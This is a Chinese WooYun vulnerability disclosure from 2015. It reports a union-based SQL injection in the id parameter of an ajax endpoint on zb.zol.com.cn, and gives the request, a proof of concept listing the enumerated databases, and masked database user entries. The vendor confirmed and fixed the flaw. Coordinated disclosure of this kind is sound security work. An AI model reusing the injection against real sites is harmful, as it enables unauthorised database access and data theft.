乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-04: 细节已通知厂商并且等待厂商处理中 2015-03-04: 厂商已经确认,细节仅向厂商公开 2015-03-05: 厂商已经修复漏洞并主动公开,细节向公众公开
我欣赏中关村这个厂商,乌云有你更精彩~
网站:zb.zol.com.cn参数id注入支持union
GET /ajax/get_subcat_data.php?_=1425426584209&type=1&id=54 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5X-Requested-With: XMLHttpRequestCache-Control: no-cacheHost: zb.zol.com.cnAccept-Encoding: gzip, deflate
poc:
available databases [5]:[*] information_schema[*] mysql[*] performance_schema[*] test[*] zoldb
大量数据库用户
*****nagement sys**********;@'10.**********#039;@'1**********#039;@'1**********'@'**********;@'10.**********@'10.1**********9;@'10**********39;@'10**********039;@'1**********39;@'10**********@'10.1**********39;@'10**********;@'10.**********'10.1**********;@'10**********;@'10.**********39;@'10**********@'10.1**********39;@'1**********9;@'10**********9;@'10**********9;@'10.**********9;@'10**********9;@'10**********@'10.**********;@'10**********;@'10**********@'10.**********#039;@'**********9;@'10.**********39;@'1**********39;@'1**********039;@'1**********'@'**********#039;@'**********@'10.1**********;@'10.**********;@'10**********;@'10.**********;@'10.**********;@'10.**********39;@'10**********'@'**********39;@'1**********039;@'1**********39;@'1**********9;@'10**********39;@'1**********9;@'10.**********039;@'1**********#039;@'**********'@'**********;@'10**********;@'10.**********39;@'10**********39;@'1**********39;@'10**********;@'10.**********9;@'10**********;@'10.**********;@'10**********@'10.1**********@'10.1**********@'10.1**********@'10.1**********9;@'10**********;@'10.**********39;@'1**********39;@'1**********;@'10**********39;@'1**********@'10.1**********'10.1**********@'10.1**********@'10.1**********9;@'10**********;@'10.**********@'10.1**********'10.1**********;@'10**********;@'10**********9;@'10**********9;@'10.**********39;@'10**********9;@'10**********9;@'10**********.15.185.0\\/255**********;@'10**********;@'12**********;@'lo**********;@'10**********;@'10.**********9;@'10**********9;@'10.**********@'10.1**********9;@'10**********;@'10.**********;@'10.**********;@'10**********9;@'10**********@'10.1**********9;@'10**********39;@'1**********@'10.**********39;@'10**********9;@'10**********@'10.1**********9;@'10**********;@'10.**********#039;@'**********039;@'1**********#039;@'**********@'10.1**********9;@'10.**********9;@'10**********'10.1**********cod*****
未来捍卫中关村的安全,数据库密码就不爆了,呵呵基本包括所有系统了,全线产品。
危害等级:中
漏洞Rank:6
确认时间:2015-03-04 13:35
已反馈漏洞,会尽快修复~~
2015-03-05:已修复,感谢“Forever80s”